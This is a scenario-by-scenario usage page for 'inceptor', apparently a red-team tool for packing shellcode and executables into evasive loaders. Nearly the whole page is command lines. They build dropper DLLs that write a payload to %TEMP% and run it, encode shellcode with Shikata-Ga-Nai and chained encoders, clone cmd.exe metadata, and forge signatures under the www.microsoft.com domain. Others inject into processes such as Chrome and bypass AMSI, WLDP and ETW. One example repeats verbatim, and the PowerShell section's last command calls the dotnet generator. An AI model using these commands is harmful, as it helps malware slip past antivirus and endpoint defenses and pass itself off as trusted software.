Examples by scenario

Examples

This page should serve as a scenario-based reference for anyone "learning" how to use inceptor and try to take the maximum from it.

Basic usage

Native Generator

Packing of raw shellcode into native exe, using default compiler (cl.exe)

python inceptor.py native shellcode.raw -o packed.exe

Packing of raw shellcode into native DLL, using default compiler (cl.exe)

python inceptor.py native shellcode.raw -o packed.dll

Packing of raw shellcode into native DLL, using alternate compiler (clang.exe)

python inceptor.py native shellcode.raw -o packed.dll -C clang

Packing of raw shellcode into native DLL, using alternate compiler (clang.exe)

python inceptor.py native shellcode.raw -o packed.dll -C clang

Packing of raw shellcode into native DLL, using an external definition file for exported functions (avoid name mangling)

python inceptor.py native shellcode.raw -o packed.dll --exports ".\exports.def"

Packing of raw shellcode into native EXE, and compilation of a "dropper" DLL. In the example below, the dropper DLL will write the file packed.exe into %TEMP%, then executing it via system("%TEMP%\packed.exe").

python inceptor.py native shellcode.raw -o packed.exe --dll

Packing of raw shellcode into native EXE, using Shikata-Ga-Nai to encode the shellcode

python inceptor.py native shellcode.raw -o packed.exe --sgn

Packing of raw shellcode into native EXE, using a chain of loader-dependent encoders

python inceptor.py native shellcode.raw -o packed.exe -e nop -e xor

Packing of raw shellcode into native EXE, cloning the metadata from C:\Windows\System32\cmd.exe

python inceptor.py native shellcode.raw -o packed.exe --clone "C:\Windows\System32\cmd.exe"

Packing of raw shellcode into native EXE, signing the binary using CarbonCopy and www.microsoft.com domain

python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com 

Packing of raw shellcode into native EXE, signing the binary with LazySign and www.microsoft.com domain

python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -so 

Packing of raw shellcode into native EXE, signing the binary with SigThief (also clone metadata)

python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"

Packing of EXE into native EXE, using pe_to_shellcode

python inceptor.py native to_pack.exe -o packed.exe -t pe2sh  

Packing of EXE into native EXE, using donut, and using process injection templates

python inceptor.py native to_pack.exe -o packed.exe -t donut -P  

Packing of EXE into native EXE, using donut, using process injection templates, and telling the loader to inject into "Chrome"

python inceptor.py native to_pack.exe -o packed.exe -t donut -P -P0 chrome

Packing a managed DLL into native EXE, using class Namezpace.Clazz and method Meth as EntryPoint

python inceptor.py native to_pack.exe -o packed.exe --classname Namezpace.Clazz --function meth

Dotnet

Most of the examples above can be also used with the DotNet generator.

Packing RAW shellcode into managed EXE, using DInvoke and AMSI/WLDP/ETW bypass

python inceptor.py dotnet to_pack.exe -o packed.exe -m dinvoke -m amsi

Packing RAW shellcode into managed EXE, obfuscating the final binary

python inceptor.py dotnet to_pack.exe -o packed.exe -O

Packing an EXE as a full .NET assembly (to reflectively load via assembly load) into another dotnet, using a chain of LD encoders

python inceptor.py dotnet to_pack.exe -o packed.exe -e xor -e aes -e hex

[*] Multiple compatible templates identified, choose one:
  0: assembly_load.cs
  1: classic.cs
  $> 1

PowerShell

Wrap an EXE as a full .NET assembly (to reflectively load via assembly load) into another dotnet, using a chain of LD encoders

python inceptor.py powershell to_pack.exe -o packed.ps1 -e xor -e aes -e hex

Packing RAW shellcode into PowerShell script, obfuscating the final script and adding AMSI bypass

python inceptor.py dotnet to_pack.exe -o packed.exe -O -m amsi